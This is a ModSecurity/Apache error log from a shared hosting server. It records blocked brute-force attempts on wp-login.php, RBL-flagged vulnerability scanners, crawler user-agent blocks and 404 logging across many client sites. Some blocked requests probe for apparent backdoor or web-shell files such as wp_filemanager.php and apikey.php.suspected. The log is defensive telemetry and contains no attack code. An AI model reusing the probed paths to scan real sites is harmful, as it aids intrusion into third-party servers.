[Tue May 26 19:19:10.823973 2026] [security2:error] [pid 37506:tid 37722] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk1gKctTPx5f8aOzkGUgAAAFY"]
[Tue May 26 19:19:11.253417 2026] [security2:error] [pid 37506:tid 37719] [client 216.73.217.177:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWk1QKctTPx5f8aOzkGFQAAU24"]
[Tue May 26 19:19:12.423613 2026] [security2:error] [pid 37506:tid 37541] [remote 57.141.2.9:63267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWk2AKctTPx5f8aOzkGvwAABSI"]
[Tue May 26 19:19:12.458146 2026] [security2:error] [pid 37506:tid 37686] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk2AKctTPx5f8aOzkGrQAAADI"]
[Tue May 26 19:19:12.751747 2026] [security2:error] [pid 37506:tid 37677] [client 31.57.184.107:53989] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.hopehelpinghand.taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWk2AKctTPx5f8aOzkG1AAAACk"]
[Tue May 26 19:19:15.012916 2026] [security2:error] [pid 37506:tid 37745] [client 14.171.116.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk2gKctTPx5f8aOzkHOwAAAG0"]
[Tue May 26 19:19:15.316830 2026] [security2:error] [pid 37506:tid 37691] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk2gKctTPx5f8aOzkHSgAAADc"]
[Tue May 26 19:19:16.430692 2026] [security2:error] [pid 37506:tid 37714] [client 114.119.159.121:42489] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "grandconclaveindia.org.in"] [uri "/robots.txt"] [unique_id "ahWk3AKctTPx5f8aOzkHdgAAAE4"]
[Tue May 26 19:19:17.664087 2026] [security2:error] [pid 37506:tid 37684] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk3QKctTPx5f8aOzkHlwAAADA"]
[Tue May 26 19:19:19.772317 2026] [security2:error] [pid 37506:tid 37604] [remote 18.116.210.19:32864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.210.116.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWk3wKctTPx5f8aOzkH8wAADGE"]
[Tue May 26 19:19:19.828463 2026] [security2:error] [pid 37506:tid 37713] [client 20.29.64.60:5507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "wrapmachines.com"] [uri "/wp-plain.php"] [unique_id "ahWk3wKctTPx5f8aOzkIEAAAAE0"], referer: www.google.com
[Tue May 26 19:19:20.126915 2026] [security2:error] [pid 37506:tid 37757] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk3wKctTPx5f8aOzkICAAAAHk"]
[Tue May 26 19:19:20.381692 2026] [security2:error] [pid 37506:tid 37708] [client 20.29.64.60:5534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "wrapmachines.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWk4AKctTPx5f8aOzkILQAAAEg"], referer: www.google.com
[Tue May 26 19:19:20.485493 2026] [security2:error] [pid 37506:tid 37616] [remote 18.116.210.19:32864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.210.116.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWk4AKctTPx5f8aOzkILgAAMm0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:19:20.622790 2026] [security2:error] [pid 37506:tid 37723] [client 20.29.64.60:5508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.wrapmachines.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWk4AKctTPx5f8aOzkIPgAAAFc"]
[Tue May 26 19:19:23.292944 2026] [security2:error] [pid 37506:tid 37652] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk4gKctTPx5f8aOzkIowAAABA"]
[Tue May 26 19:19:23.677153 2026] [security2:error] [pid 37506:tid 37532] [remote 171.235.163.210:56444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.163.235.171.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWk4wKctTPx5f8aOzkIvAAATxk"]
[Tue May 26 19:19:23.894803 2026] [security2:error] [pid 37506:tid 37755] [client 20.29.64.60:5528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.wrapmachines.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWk4wKctTPx5f8aOzkI2wAAAHc"]
[Tue May 26 19:19:23.999330 2026] [security2:error] [pid 37506:tid 37668] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk4wKctTPx5f8aOzkIwwAAACA"]
[Tue May 26 19:19:24.115263 2026] [security2:error] [pid 37506:tid 37760] [client 20.29.64.60:5528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "wrapmachines.com"] [uri "/lnfarjwj.php"] [unique_id "ahWk5AKctTPx5f8aOzkI4gAAAHw"], referer: www.google.com
[Tue May 26 19:19:24.548241 2026] [security2:error] [pid 37506:tid 37547] [remote 51.91.98.45:49920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWk5AKctTPx5f8aOzkI9AAAcig"]
[Tue May 26 19:19:26.591605 2026] [security2:error] [pid 37506:tid 37689] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk5gKctTPx5f8aOzkJSwAAADU"]
[Tue May 26 19:19:27.175732 2026] [security2:error] [pid 37506:tid 37575] [remote 79.116.52.1:47134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.52.116.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWk5gKctTPx5f8aOzkJcwAAdUQ"]
[Tue May 26 19:19:27.829846 2026] [security2:error] [pid 37506:tid 37687] [client 114.119.133.46:33677] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "worldwidecourier.co.in"] [uri "/2023/05/01/business-tech-news/"] [unique_id "ahWk5wKctTPx5f8aOzkJlwAAADM"], referer: https://worldwidecourier.co.in/category/uncategorized/page/1/
[Tue May 26 19:19:28.170231 2026] [security2:error] [pid 37506:tid 37738] [client 20.29.64.60:5505] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.wrapmachines.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWk6AKctTPx5f8aOzkJqQAAAGY"]
[Tue May 26 19:19:28.784240 2026] [security2:error] [pid 37506:tid 37761] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk6AKctTPx5f8aOzkJrwAAAH0"]
[Tue May 26 19:19:30.112836 2026] [security2:error] [pid 37506:tid 37757] [client 66.249.92.205:60449] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWk6QKctTPx5f8aOzkJ5AAAAHk"], referer: https://haddingtonwines.com/wp-content/themes/ri-winnes/css/font-awesome.css
[Tue May 26 19:19:30.473266 2026] [fcgid:warn] [pid 37506:tid 37639] (70014)End of file found: [client 199.45.155.104:55768] mod_fcgid: can't get data from http client
[Tue May 26 19:19:30.509808 2026] [security2:error] [pid 37506:tid 37662] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk6gKctTPx5f8aOzkJ_AAAABo"]
[Tue May 26 19:19:30.620780 2026] [security2:error] [pid 37506:tid 37729] [client 20.29.64.60:5519] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.wrapmachines.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWk6gKctTPx5f8aOzkKHwAAAF0"]
[Tue May 26 19:19:32.865793 2026] [security2:error] [pid 37506:tid 37668] [client 66.249.92.198:61886] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWk7AKctTPx5f8aOzkKawAAACA"], referer: https://haddingtonwines.com/wp-content/themes/ri-winnes/css/font-awesome.css
[Tue May 26 19:19:33.309595 2026] [security2:error] [pid 37506:tid 37732] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk7AKctTPx5f8aOzkKhgAAAGA"]
[Tue May 26 19:19:33.977414 2026] [security2:error] [pid 37506:tid 37659] [client 66.84.91.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWk7AKctTPx5f8aOzkKfQAAABc"], referer: https://www.anujtradingco.com/
[Tue May 26 19:19:35.592557 2026] [security2:error] [pid 37506:tid 37755] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk7wKctTPx5f8aOzkK4wAAAHc"]
[Tue May 26 19:19:36.069277 2026] [security2:error] [pid 37506:tid 37707] [client 66.84.91.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWk7wKctTPx5f8aOzkLEgAAAEc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1445262&moderation-hash=327638a64d5c97f3d59a4a950fe1f415
[Tue May 26 19:19:36.620385 2026] [security2:error] [pid 37506:tid 37655] [client 85.208.96.193:41156] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/event/list/"] [unique_id "ahWk8AKctTPx5f8aOzkLNgAAABM"]
[Tue May 26 19:19:36.620539 2026] [security2:error] [pid 37506:tid 37655] [client 85.208.96.193:41156] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/event/list/"] [unique_id "ahWk8AKctTPx5f8aOzkLNgAAABM"]
[Tue May 26 19:19:37.631634 2026] [security2:error] [pid 37506:tid 37687] [client 66.249.92.205:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWk8QKctTPx5f8aOzkLXwAAADM"], referer: https://haddingtonwines.com/wp-content/themes/ri-winnes/css/font-awesome.css
[Tue May 26 19:19:37.801676 2026] [security2:error] [pid 37506:tid 37743] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk8QKctTPx5f8aOzkLXAAAAGs"]
[Tue May 26 19:19:39.627507 2026] [security2:error] [pid 37506:tid 37655] [client 171.226.113.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk8wKctTPx5f8aOzkLuwAAABM"]
[Tue May 26 19:19:39.984179 2026] [security2:error] [pid 37506:tid 37759] [client 66.84.91.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWk8wKctTPx5f8aOzkL7AAAAHs"], referer: https://anujtradingco.com
[Tue May 26 19:19:40.008881 2026] [security2:error] [pid 37506:tid 37608] [remote 216.73.216.30:9149] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWk9AKctTPx5f8aOzkL8AAAJWU"]
[Tue May 26 19:19:40.274677 2026] [security2:error] [pid 37506:tid 37675] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk8wKctTPx5f8aOzkL4wAAACc"]
[Tue May 26 19:19:40.573458 2026] [security2:error] [pid 37506:tid 37616] [remote 216.73.216.30:9149] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWk9AKctTPx5f8aOzkMCgAAJW0"]
[Tue May 26 19:19:41.856292 2026] [security2:error] [pid 37506:tid 37750] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk9QKctTPx5f8aOzkMLgAAAHI"]
[Tue May 26 19:19:42.658888 2026] [security2:error] [pid 37506:tid 37521] [remote 121.200.216.55:51410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWk9gKctTPx5f8aOzkMZQAAYA4"]
[Tue May 26 19:19:44.828182 2026] [security2:error] [pid 37506:tid 37710] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk-AKctTPx5f8aOzkMywAAAEo"]
[Tue May 26 19:19:45.951061 2026] [security2:error] [pid 37506:tid 37555] [remote 50.6.207.27:53382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.207.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWk-QKctTPx5f8aOzkM_wAARTA"]
[Tue May 26 19:19:46.855242 2026] [security2:error] [pid 37506:tid 37710] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk-gKctTPx5f8aOzkNHAAAAEo"]
[Tue May 26 19:19:47.276564 2026] [security2:error] [pid 37506:tid 37715] [client 20.226.249.33:2647] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWk-wKctTPx5f8aOzkNSQAAAE8"]
[Tue May 26 19:19:47.276706 2026] [security2:error] [pid 37506:tid 37715] [client 20.226.249.33:2647] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWk-wKctTPx5f8aOzkNSQAAAE8"]
[Tue May 26 19:19:47.277174 2026] [security2:error] [pid 37506:tid 37638] [client 114.119.151.233:52909] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/site/wp-content/uploads/2020/08/MoesArt_Blog_3.png"] [unique_id "ahWk-wKctTPx5f8aOzkNTgAAAAI"], referer: http://moes-art.com/blog/influencer-marketing-simplified
[Tue May 26 19:19:47.669339 2026] [security2:error] [pid 37506:tid 37578] [remote 50.6.207.27:53382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.207.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWk-wKctTPx5f8aOzkNYgAAIkc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:19:47.885792 2026] [security2:error] [pid 37506:tid 37702] [client 20.226.249.33:27002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/aaa.php"] [unique_id "ahWk-wKctTPx5f8aOzkNcQAAAEI"]
[Tue May 26 19:19:47.885885 2026] [security2:error] [pid 37506:tid 37702] [client 20.226.249.33:27002] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/aaa.php"] [unique_id "ahWk-wKctTPx5f8aOzkNcQAAAEI"]
[Tue May 26 19:19:48.281986 2026] [security2:error] [pid 37506:tid 37700] [client 20.226.249.33:9951] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahWk_AKctTPx5f8aOzkNhgAAAEA"]
[Tue May 26 19:19:48.282100 2026] [security2:error] [pid 37506:tid 37700] [client 20.226.249.33:9951] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahWk_AKctTPx5f8aOzkNhgAAAEA"]
[Tue May 26 19:19:48.649047 2026] [security2:error] [pid 37506:tid 37670] [client 20.226.249.33:9148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-includes/Text/Diff/index.php"] [unique_id "ahWk_AKctTPx5f8aOzkNmgAAACI"]
[Tue May 26 19:19:48.649186 2026] [security2:error] [pid 37506:tid 37670] [client 20.226.249.33:9148] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-includes/Text/Diff/index.php"] [unique_id "ahWk_AKctTPx5f8aOzkNmgAAACI"]
[Tue May 26 19:19:49.157756 2026] [security2:error] [pid 37506:tid 37652] [client 62.244.225.226:44302] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWk_AKctTPx5f8aOzkNqgAAABA"]
[Tue May 26 19:19:49.288771 2026] [security2:error] [pid 37506:tid 37643] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk_AKctTPx5f8aOzkNowAAAAc"]
